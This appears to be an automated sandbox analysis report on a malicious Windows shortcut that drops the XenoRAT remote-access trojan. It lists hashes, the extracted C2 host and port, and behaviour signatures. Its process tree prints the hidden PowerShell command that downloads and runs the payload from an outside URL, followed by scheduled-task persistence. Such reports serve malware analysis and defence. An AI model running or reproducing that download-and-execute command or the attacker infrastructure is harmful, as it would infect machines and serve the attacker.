Analysis
-
max time kernel
142s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
03/05/2024, 12:32
Static task
static1
Behavioral task
behavioral1
Sample
Odeme -(Mayis).lnk
Resource
win7-20231129-en
General
-
Target
Odeme -(Mayis).lnk
-
Size
2KB
-
MD5
2ad899ef7b0d361186d8487950b7e167
-
SHA1
151d04d656e68152cc2116b0837331a7df30eb27
-
SHA256
2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618
-
SHA512
2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b
Malware Config
Extracted
https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif
Extracted
xenorat
dns.requimacofradian.site
Xeno_rat_nd8818g
-
delay
60000
-
install_path
appdata
-
port
1243
-
startup_name
uic
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 380 PoWeRShElL.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 380 PoWeRShElL.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation screenbiwus.pif -
Executes dropped EXE 8 IoCs
pid Process 4776 screenbiwus.pif 4072 screenbiwus.pif 1032 screenbiwus.pif 4484 screenbiwus.pif 2500 screenbiwus.pif 3552 screenbiwus.pif 1304 screenbiwus.pif 4488 screenbiwus.pif -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4776 set thread context of 4072 4776 screenbiwus.pif 90 PID 4776 set thread context of 1032 4776 screenbiwus.pif 91 PID 4776 set thread context of 4484 4776 screenbiwus.pif 93 PID 2500 set thread context of 3552 2500 screenbiwus.pif 99 PID 2500 set thread context of 1304 2500 screenbiwus.pif 100 PID 2500 set thread context of 4488 2500 screenbiwus.pif 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4556 4072 WerFault.exe 90 4912 4488 WerFault.exe 101 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4484 schtasks.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Local Settings PoWeRShElL.exe Key created \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 380 PoWeRShElL.exe 380 PoWeRShElL.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 380 PoWeRShElL.exe Token: SeDebugPrivilege 4776 screenbiwus.pif Token: SeDebugPrivilege 2500 screenbiwus.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3328 OpenWith.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 4892 wrote to memory of 380 4892 cmd.exe 84 PID 4892 wrote to memory of 380 4892 cmd.exe 84 PID 380 wrote to memory of 4776 380 PoWeRShElL.exe 89 PID 380 wrote to memory of 4776 380 PoWeRShElL.exe 89 PID 380 wrote to memory of 4776 380 PoWeRShElL.exe 89 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 4072 4776 screenbiwus.pif 90 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 1032 4776 screenbiwus.pif 91 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4776 wrote to memory of 4484 4776 screenbiwus.pif 93 PID 4484 wrote to memory of 2500 4484 screenbiwus.pif 98 PID 4484 wrote to memory of 2500 4484 screenbiwus.pif 98 PID 4484 wrote to memory of 2500 4484 screenbiwus.pif 98 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 3552 2500 screenbiwus.pif 99 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 1304 2500 screenbiwus.pif 100 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 2500 wrote to memory of 4488 2500 screenbiwus.pif 101 PID 1032 wrote to memory of 4484 1032 screenbiwus.pif 114 PID 1032 wrote to memory of 4484 1032 screenbiwus.pif 114 PID 1032 wrote to memory of 4484 1032 screenbiwus.pif 114
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Odeme -(Mayis).lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif"C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Users\Admin\AppData\Local\Temp\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\screenbiwus.pif4⤵
- Executes dropped EXE
PID:4072 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 805⤵
- Program crash
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\screenbiwus.pif4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2FA6.tmp" /F5⤵
- Creates scheduled task(s)
PID:4484
-
-
-
C:\Users\Admin\AppData\Local\Temp\screenbiwus.pifC:\Users\Admin\AppData\Local\Temp\screenbiwus.pif4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:3552
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:1304
-
-
C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pifC:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif6⤵
- Executes dropped EXE
PID:4488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 127⤵
- Program crash
PID:4912
-
-
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4072 -ip 40721⤵PID:912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4488 -ip 44881⤵PID:4880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD5d95c58e609838928f0f49837cab7dfd2
SHA155e7139a1e3899195b92ed8771d1ca2c7d53c916
SHA2560407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339
SHA512405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
243KB
MD5beca6ece3880c98abce728f690fc6af9
SHA153f7cef644803c6de63008b6ac0dae0c53509760
SHA2561e1870659de245d275192567b800859af41e84711a70754df1a7bc20ee01f79d
SHA51252892dce5b7e9518482cec1e5e415310262897e008a87a120f02432f62d3d13ddad2a290741a6e51db790e430c43d595dfb16e8bf1fc6eddf69a9315e4be5174
-
Filesize
1KB
MD586c5744348e031d55bafc55a87803993
SHA1a6c1b3a008ed463c230cd991a4da483614b327c5
SHA256b9fba7507a114d649f188f61f7ffa32aa3582bdbba35b1f54afaeb7472a985f1
SHA512ea0c6ef44c952825651d8004c98e982e84eff6d7252cd83f76d8e37b33a558eb0e995ba0fa4f47ab493c32781ca31c56de135a0a9c1b487e35925bb13a383731